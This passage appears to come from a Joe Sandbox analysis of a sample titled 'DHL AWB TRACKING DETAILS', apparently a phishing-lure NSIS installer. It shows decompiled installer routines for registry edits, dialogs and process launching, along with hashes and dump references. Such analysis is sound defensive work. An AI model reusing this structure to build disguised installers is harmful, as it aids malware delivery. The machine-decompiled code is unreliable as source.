                    0x0040236b
                    0x0040236f
                    0x0040237b
                    0x0040237b
                    0x00402394
                    0x00402396
                    0x00402396
                    0x00402399
                    0x0040246f
                    0x0040246f
                    0x00402880
                    0x0040288c

                    APIs
                    • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402333
                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp,00000023,?,?,?,00000000,?,?,?,00000011,00000002), ref: 00402353
                    • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040238C
                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp,00000000,?,?,?,00000000,?,?,?,00000011,00000002), ref: 0040246F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CloseCreateValuelstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp
                    • API String ID: 1356686001-535908173
                    • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                    • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                    • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                    • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8; // 0x0
					if(__eflags == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}







                    0x00402bd1
                    0x00402bd3
                    0x00402bda
                    0x00402bdd
                    0x00402bdd
                    0x00402be3
                    0x00000000
                    0x00402be3
                    0x00402beb
                    0x00402bf1
                    0x00000000
                    0x00402bf4
                    0x00402bfb
                    0x00402c01
                    0x00402c07
                    0x00402c09
                    0x00402c0f
                    0x00402c4d
                    0x00402c53
                    0x00000000
                    0x00402c53
                    0x00402c11
                    0x00402c18
                    0x00402c29
                    0x00000000
                    0x00402c37
                    0x00402c18
                    0x00402c5a

                    APIs
                    • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                    • GetTickCount.KERNEL32 ref: 00402BFB
                    • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                      • Part of subcall function 00402BA9: MulDiv.KERNEL32(00000000,00000064,00004081), ref: 00402BBE
                    • wsprintfA.USER32 ref: 00402C29
                      • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                      • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                      • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                      • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                    • String ID: ... %d%%
                    • API String ID: 632923820-2449383134
                    • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                    • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                    • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                    • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402A28 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E00402A28(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423f50; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A28(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						__eflags =  *0x423f50; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}










                    0x00402a38
                    0x00402a49
                    0x00402a51
                    0x00402a79
                    0x00402a60
                    0x00402a63
                    0x00402ab3
                    0x00402ab9
                    0x00402abb
                    0x00000000
                    0x00402abb
                    0x00402a70
                    0x00402a75
                    0x00402a77
                    0x00000000
                    0x00000000
                    0x00402a77
                    0x00402a8e
                    0x00402a96
                    0x00402a9d
                    0x00402ac3
                    0x00402ac9
                    0x00000000
                    0x00000000
                    0x00402ad1
                    0x00402ad7
                    0x00402ad9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00402ad9
                    0x00000000
                    0x00402aac
                    0x00402ac0

                    APIs
                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                    • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                    • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Close$DeleteEnumOpen
                    • String ID:
                    • API String ID: 1912718029-0
                    • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                    • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                    • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                    • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                    0x00401ccb
                    0x00401cd2
                    0x00401d01
                    0x00401d09
                    0x00401d10
                    0x00401d10
                    0x00402880
                    0x0040288c

                    APIs
                    • GetDlgItem.USER32 ref: 00401CC5
                    • GetClientRect.USER32 ref: 00401CD2
                    • LoadImageA.USER32 ref: 00401CF3
                    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                    • DeleteObject.GDI32(00000000), ref: 00401D10
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                    • String ID:
                    • API String ID: 1849352358-0
                    • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                    • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                    • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                    • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404610 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 51%
                    			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}













                    0x00404618
                    0x0040461c
                    0x00404624
                    0x00404627
                    0x00404628
                    0x0040462a
                    0x0040462c
                    0x0040462f
                    0x0040462f
                    0x00404636
                    0x0040463c
                    0x0040463c
                    0x00404643
                    0x0040464e
                    0x0040464f
                    0x00404652
                    0x00404652
                    0x0040465f
                    0x0040466a
                    0x0040466d
                    0x0040467f
                    0x00404686
                    0x00404687
                    0x00404696
                    0x004046a6
                    0x004046c2

                    APIs
                    • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                    • wsprintfA.USER32 ref: 004046A6
                    • SetDlgItemTextA.USER32 ref: 004046B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: ItemTextlstrlenwsprintf
                    • String ID: %u.%u%s%s
                    • API String ID: 3540041739-3551169577
                    • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                    • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                    • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                    • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 51%
                    			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                    0x00401bb6
                    0x00401bc2
                    0x00401bc5
                    0x00401bce
                    0x00401bce
                    0x00401bd1
                    0x00401bd5
                    0x00401bde
                    0x00401bde
                    0x00401be1
                    0x00401be5
                    0x00401be7
                    0x00401c34
                    0x00401c36
                    0x00401c3f
                    0x00401c47
                    0x00401c4a
                    0x00401c4a
                    0x00401c53
                    0x00000000
                    0x00401be9
                    0x00401bf0
                    0x00401bf2
                    0x00401bfa
                    0x00401bfd
                    0x00401c25
                    0x00401c59
                    0x00401c59
                    0x00401bff
                    0x00401c0d
                    0x00401c15
                    0x00401c18
                    0x00401c18
                    0x00401bfd
                    0x00401c5c
                    0x00401c5f
                    0x00401c65
                    0x00402825
                    0x00402825
                    0x00402880
                    0x0040288c

                    APIs
                    • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                    • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$Timeout
                    • String ID: !
                    • API String ID: 1777923405-2657877971
                    • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                    • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                    • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                    • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403897 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423eb0; // 0x50f930
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, "nkdpnsqeoocyepqnevm Setup", 0xfffffffe));
						_t11 =  *0x423ecc; // 0x2
						_t27 =  *0x423ec8; // 0x50fadc
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x50faf4
								_t11 = E00405AA7(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                    0x0040389b
                    0x004038a0
                    0x004038a6
                    0x004038ab
                    0x004038ab
                    0x004038b3
                    0x00000000
                    0x00000000
                    0x004038b5
                    0x004038bb
                    0x004038c3
                    0x004038c5
                    0x004038cb
                    0x004038cb
                    0x004038cd
                    0x004038d9
                    0x00000000
                    0x00000000
                    0x004038dd
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004038df
                    0x004038e4
                    0x004038ed
                    0x004038f3
                    0x004038f8
                    0x0040390c
                    0x00403917
                    0x0040392f
                    0x00403935
                    0x0040393a
                    0x00403942
                    0x00403963
                    0x00403963
                    0x00403963
                    0x00403944
                    0x00403946
                    0x00403946
                    0x0040394a
                    0x0040394d
                    0x00403951
                    0x00403951
                    0x00403956
                    0x0040395c
                    0x0040395c
                    0x00000000
                    0x00403946
                    0x004038fa
                    0x004038ff
                    0x00403908
                    0x00403901
                    0x00403901
                    0x00403901
                    0x004038ff

                    APIs
                    • SetWindowTextA.USER32(00000000,nkdpnsqeoocyepqnevm Setup), ref: 0040392F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: TextWindow
                    • String ID: 1033$C:\Users\user\AppData\Local\Temp\$nkdpnsqeoocyepqnevm Setup
                    • API String ID: 530164218-3505690716
                    • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                    • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                    • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                    • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004052E5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                    0x004052ee
                    0x0040530a
                    0x00405312
                    0x00405317
                    0x00000000
                    0x0040531d
                    0x00405321

                    APIs
                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                    • CloseHandle.KERNEL32(?), ref: 00405317
                    Strings
                    • Error launching installer, xrefs: 004052F8
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CloseCreateHandleProcess
                    • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                    • API String ID: 3712363035-4043152584
                    • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                    • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                    • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                    • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405578 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}




                    0x00405579
                    0x00405590
                    0x00405598
                    0x00405598
                    0x004055a0

                    APIs
                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                    • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
